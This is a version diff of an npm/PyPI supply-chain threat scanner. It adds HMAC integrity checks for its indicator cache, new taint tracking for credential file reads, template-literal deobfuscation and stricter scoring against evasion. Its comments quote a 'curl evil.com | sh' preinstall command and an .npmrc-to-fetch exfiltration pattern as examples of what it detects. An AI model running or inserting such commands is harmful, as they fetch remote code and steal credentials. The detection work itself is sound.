muaddib-scanner 2.5.12 → 2.5.13

package/logs/alerts/{2026-03-07T16-18-04-719-evil-pkg.json → 2026-03-07T17-50-50-825-evil-pkg.json}

@@ -1,6 +1,6 @@
 {
   "target": "npm/evil-pkg@1.0.0",
-  "timestamp": "2026-03-07T16:18:04.719Z",
+  "timestamp": "2026-03-07T17:50:50.825Z",
   "ecosystem": "npm",
   "summary": {
     "critical": 1,

package/logs/alerts/{2026-03-07T16-18-04-720-suspect-pkg.json → 2026-03-07T17-50-50-826-suspect-pkg.json}

@@ -1,6 +1,6 @@
 {
   "target": "npm/suspect-pkg@1.0",
-  "timestamp": "2026-03-07T16:18:04.720Z",
+  "timestamp": "2026-03-07T17:50:50.826Z",
   "ecosystem": "npm",
   "summary": {
     "critical": 0,

package/logs/alerts/{2026-03-07T16-18-04-720-evil-pkg.json → 2026-03-07T17-50-50-827-evil-pkg.json}

@@ -1,6 +1,6 @@
 {
   "target": "npm/evil-pkg@1.0.0",
-  "timestamp": "2026-03-07T16:18:04.720Z",
+  "timestamp": "2026-03-07T17:50:50.826Z",
   "ecosystem": "npm",
   "summary": {
     "critical": 1,

package/logs/alerts/{2026-03-07T16-18-05-033-evil-pkg.json → 2026-03-07T17-50-51-268-evil-pkg.json}

@@ -1,6 +1,6 @@
 {
   "target": "npm/evil-pkg@2.0.0",
-  "timestamp": "2026-03-07T16:18:05.033Z",
+  "timestamp": "2026-03-07T17:50:51.268Z",
   "ecosystem": "npm",
   "summary": {
     "critical": 1,

package/logs/daily-reports/2026-03-07.json

@@ -1,6 +1,6 @@
 {
   "date": "2026-03-07",
-  "timestamp": "2026-03-07T16:18:05.131Z",
+  "timestamp": "2026-03-07T17:50:51.399Z",
   "embed": {
     "embeds": [
       {
@@ -34,14 +34,14 @@
           },
           {
             "name": "Top Suspects",
-            "value": "1. **npm/test-dedup-detection-1772900284717@1.0.0** — 1 finding(s)",
+            "value": "1. **npm/test-dedup-detection-1772905850823@1.0.0** — 1 finding(s)",
             "inline": false
           }
         ],
         "footer": {
-          "text": "MUAD'DIB - Daily summary | 2026-03-07 16:18:05 UTC"
+          "text": "MUAD'DIB - Daily summary | 2026-03-07 17:50:51 UTC"
         },
-        "timestamp": "2026-03-07T16:18:05.131Z"
+        "timestamp": "2026-03-07T17:50:51.399Z"
       }
     ]
   },

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.5.12",
+  "version": "2.5.13",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/ioc/scraper.js

@@ -1226,8 +1226,18 @@ async function runScraper() {
   }
   try {
     const tmpHomeFile = HOME_IOC_FILE + '.tmp';
-    fs.writeFileSync(tmpHomeFile, JSON.stringify(existingIOCs, null, 2));
+    const homeJsonData = JSON.stringify(existingIOCs, null, 2);
+    fs.writeFileSync(tmpHomeFile, homeJsonData);
+    // Write HMAC before rename for consistency with updater.js
+    const { generateIOCHMAC } = require('./updater.js');
+    const homeHmac = generateIOCHMAC(homeJsonData);
+    fs.writeFileSync(HOME_IOC_FILE + '.hmac', homeHmac);
     fs.renameSync(tmpHomeFile, HOME_IOC_FILE);
+    // Mark HMAC as initialized
+    const hmacMarker = path.join(homeDir, '.hmac-initialized');
+    if (!fs.existsSync(hmacMarker)) {
+      try { fs.writeFileSync(hmacMarker, new Date().toISOString()); } catch {}
+    }
     saveSpinner.succeed('Saved IOCs + compact format + home directory');
   } catch (e) {
     saveSpinner.succeed('Saved IOCs + compact format (home dir write failed: ' + e.message + ')');

package/src/ioc/updater.js

@@ -100,14 +100,19 @@ async function updateIOCs() {
   delete baseIOCs._fileSet;
 
   // Atomic write: write to .tmp then rename (UP-001)
+  // HMAC written BEFORE rename to prevent race condition (crash between rename and HMAC write)
   const tmpFile = CACHE_IOC_FILE + '.tmp';
   const jsonData = JSON.stringify(baseIOCs);
   fs.writeFileSync(tmpFile, jsonData);
-  fs.renameSync(tmpFile, CACHE_IOC_FILE);
-
-  // Write HMAC signature alongside the cache file
   const hmac = generateIOCHMAC(jsonData);
   fs.writeFileSync(CACHE_IOC_FILE + '.hmac', hmac);
+  fs.renameSync(tmpFile, CACHE_IOC_FILE);
+
+  // Mark HMAC as initialized — future loads require HMAC presence
+  const hmacMarker = path.join(HOME_DATA_PATH, '.hmac-initialized');
+  if (!fs.existsSync(hmacMarker)) {
+    try { fs.writeFileSync(hmacMarker, new Date().toISOString()); } catch {}
+  }
 
   const totalNpm = baseIOCs.packages.length;
   const totalPyPI = (baseIOCs.pypi_packages || []).length;
@@ -236,8 +241,15 @@ function loadCachedIOCs() {
           mergeIOCs(merged, JSON.parse(cachedData));
         }
       } else {
-        // No HMAC file yet (first run or pre-HMAC version) — load but warn
-        mergeIOCs(merged, JSON.parse(cachedData));
+        // No HMAC file — check if HMAC was previously initialized
+        const hmacMarker = path.join(HOME_DATA_PATH, '.hmac-initialized');
+        if (fs.existsSync(hmacMarker)) {
+          // HMAC was initialized before but .hmac file is missing → possible tampering
+          console.log('[WARN] IOC cache HMAC file missing but was previously initialized — skipping cache.');
+        } else {
+          // First run or pre-HMAC version — load but warn
+          mergeIOCs(merged, JSON.parse(cachedData));
+        }
       }
     } catch (e) {
       console.log('[WARN] Failed to load cached IOCs: ' + e.message);

package/src/scanner/dataflow.js

@@ -246,6 +246,16 @@ function analyzeFile(content, filePath, basePath) {
             name: callName,
             line: node.loc?.start?.line
           });
+          // 4.2: fs.readFile callback data tainting
+          // fs.readFile('.npmrc', (err, data) => {...}) — taint `data` param
+          if (callName === 'readFile' || callName === 'fs.readFile') {
+            const lastArg = node.arguments[node.arguments.length - 1];
+            if (lastArg && (lastArg.type === 'FunctionExpression' || lastArg.type === 'ArrowFunctionExpression')) {
+              if (lastArg.params && lastArg.params.length >= 2 && lastArg.params[1].type === 'Identifier') {
+                sensitivePathVars.add(lastArg.params[1].name);
+              }
+            }
+          }
         }
       }
 
@@ -267,6 +277,35 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
 
+      // 4.1: Promise .then() callback tainting
+      // fs.promises.readFile('.npmrc').then(data => fetch(url, {body: data}))
+      // Detect .then() on a call to fs.promises.readFile with sensitive path
+      if (node.callee.type === 'MemberExpression' &&
+          node.callee.property?.type === 'Identifier' && node.callee.property.name === 'then' &&
+          node.callee.object?.type === 'CallExpression') {
+        const innerCall = node.callee.object;
+        // Check if inner call is fs.promises.readFile(sensitivePath)
+        if (innerCall.callee?.type === 'MemberExpression' &&
+            innerCall.callee.object?.type === 'MemberExpression') {
+          const outerObj2 = innerCall.callee.object.object;
+          const mid2 = innerCall.callee.object.property;
+          const method2 = innerCall.callee.property;
+          if (outerObj2?.type === 'Identifier' && mid2?.type === 'Identifier' && mid2.name === 'promises' &&
+              method2?.type === 'Identifier' && method2.name === 'readFile') {
+            const isFs2 = outerObj2.name === 'fs' || (taintMap.get(outerObj2.name)?.source === 'fs');
+            if (isFs2 && innerCall.arguments[0] && isCredentialPath(innerCall.arguments[0], sensitivePathVars)) {
+              // Taint the first param of the .then() callback
+              const thenCb = node.arguments[0];
+              if (thenCb && (thenCb.type === 'FunctionExpression' || thenCb.type === 'ArrowFunctionExpression')) {
+                if (thenCb.params && thenCb.params.length >= 1 && thenCb.params[0].type === 'Identifier') {
+                  sensitivePathVars.add(thenCb.params[0].name);
+                }
+              }
+            }
+          }
+        }
+      }
+
       if (callName === 'request' || callName === 'fetch' || callName === 'post' || callName === 'get') {
         sinks.push({
           type: 'network_send',

package/src/scanner/deobfuscate.js

@@ -47,6 +47,24 @@ function deobfuscate(sourceCode) {
       });
     },
 
+    // ---- 1b. TEMPLATE LITERAL FOLDING ----
+    // `child_process` → 'child_process' (no expression templates)
+    // `child_${'process'}` → 'child_process' (with resolvable expressions)
+    TemplateLiteral(node) {
+      const folded = tryFoldConcat(node);
+      if (folded === null) return;
+      const before = sourceCode.slice(node.start, node.end);
+      const after = quoteString(folded);
+      if (before === after) return; // no change
+      replacements.push({
+        start: node.start,
+        end: node.end,
+        value: after,
+        type: 'template_literal',
+        before
+      });
+    },
+
     // ---- 2. CHARCODE REBUILD + 3. BASE64 DECODE ----
     CallExpression(node) {
       // String.fromCharCode(99, 104, 105, 108, 100) → "child"
@@ -199,14 +217,30 @@ function propagateConsts(sourceCode) {
     VariableDeclaration(node) {
       if (node.kind !== 'const') return;
       for (const decl of node.declarations) {
-        if (decl.id?.type !== 'Identifier') continue;
         if (!decl.init) continue;
-        if (decl.init.type === 'Literal' && typeof decl.init.value === 'string') {
-          constMap.set(decl.id.name, {
-            value: decl.init.value,
-            declStart: decl.init.start,
-            declEnd: decl.init.end
-          });
+        // Standard: const x = 'literal'
+        if (decl.id?.type === 'Identifier') {
+          if (decl.init.type === 'Literal' && typeof decl.init.value === 'string') {
+            constMap.set(decl.id.name, {
+              value: decl.init.value,
+              declStart: decl.init.start,
+              declEnd: decl.init.end
+            });
+          }
+        }
+        // Array destructuring: const [a, b] = ['child_', 'process']
+        if (decl.id?.type === 'ArrayPattern' && decl.init?.type === 'ArrayExpression') {
+          for (let i = 0; i < decl.id.elements.length && i < decl.init.elements.length; i++) {
+            if (decl.id.elements[i]?.type === 'Identifier' &&
+                decl.init.elements[i]?.type === 'Literal' &&
+                typeof decl.init.elements[i].value === 'string') {
+              constMap.set(decl.id.elements[i].name, {
+                value: decl.init.elements[i].value,
+                declStart: decl.init.elements[i].start,
+                declEnd: decl.init.elements[i].end
+              });
+            }
+          }
         }
       }
     },
@@ -349,6 +383,23 @@ function tryFoldConcat(node, depth) {
   if (node.type === 'Literal' && typeof node.value === 'string') {
     return node.value;
   }
+  // TemplateLiteral without expressions → direct string
+  if (node.type === 'TemplateLiteral' && node.expressions.length === 0) {
+    return node.quasis.map(q => q.value.cooked).join('');
+  }
+  // TemplateLiteral with resolvable expressions
+  if (node.type === 'TemplateLiteral' && node.expressions.length > 0) {
+    const parts = [];
+    for (let i = 0; i < node.quasis.length; i++) {
+      parts.push(node.quasis[i].value.cooked);
+      if (i < node.expressions.length) {
+        const v = tryFoldConcat(node.expressions[i], depth + 1);
+        if (v === null) return null;
+        parts.push(v);
+      }
+    }
+    return parts.join('');
+  }
   if (node.type === 'BinaryExpression' && node.operator === '+') {
     const left = tryFoldConcat(node.left, depth + 1);
     if (left === null) return null;

package/src/scoring.js

@@ -177,9 +177,21 @@ function applyFPReductions(threats, reachableFiles, packageName) {
   // Threshold raised from >1 to >4 (audit fix: >1 was trivially exploitable).
   const pluginLoaderCount = (typeCounts.dynamic_require || 0) + (typeCounts.dynamic_import || 0);
   if (pluginLoaderCount > 4) {
+    // Per-file: only downgrade in files that individually exceed threshold
+    // Prevents attacker from distributing 5+ requires across files to downgrade all
+    const perFilePluginCount = {};
+    for (const t of threats) {
+      if (t.type === 'dynamic_require' || t.type === 'dynamic_import') {
+        const f = t.file || '(unknown)';
+        perFilePluginCount[f] = (perFilePluginCount[f] || 0) + 1;
+      }
+    }
     for (const t of threats) {
       if ((t.type === 'dynamic_require' || t.type === 'dynamic_import') && t.severity === 'HIGH') {
-        t.severity = 'LOW';
+        const f = t.file || '(unknown)';
+        if (perFilePluginCount[f] > 4) {
+          t.severity = 'LOW';
+        }
       }
     }
   }
@@ -199,7 +211,7 @@ function applyFPReductions(threats, reachableFiles, packageName) {
       // vm_code_execution: full bypass — packages with only vm.Script calls (cassandra-driver,
       // webpack, jest) are legitimate. Real malware using vm always has other signals
       // (network, fs, obfuscation). The >3 count threshold is sufficient protection.
-      if (typeRatio < 0.5 ||
+      if (typeRatio < 0.4 ||
           (t.type === 'suspicious_dataflow' && typeRatio < 0.8) ||
           t.type === 'vm_code_execution') {
         t.severity = rule.to;
@@ -296,7 +308,12 @@ function calculateRiskScore(deduped) {
   }
 
   // 4. Compute package-level score (typosquat, lifecycle, dependency IOC, etc.)
-  const packageScore = computeGroupScore(packageLevelThreats);
+  let packageScore = computeGroupScore(packageLevelThreats);
+  // Floor: CRITICAL package-level threats (lifecycle_shell_pipe, IOC match) → minimum HIGH (50)
+  // A single "curl evil.com | sh" in preinstall = 25 points = MEDIUM without floor.
+  if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL')) {
+    packageScore = Math.max(packageScore, 50);
+  }
 
   // 5. Cross-file bonus: aggregate signal from non-max files
   // A package with 3 files each scoring 20 is more suspicious than 1 file scoring 20.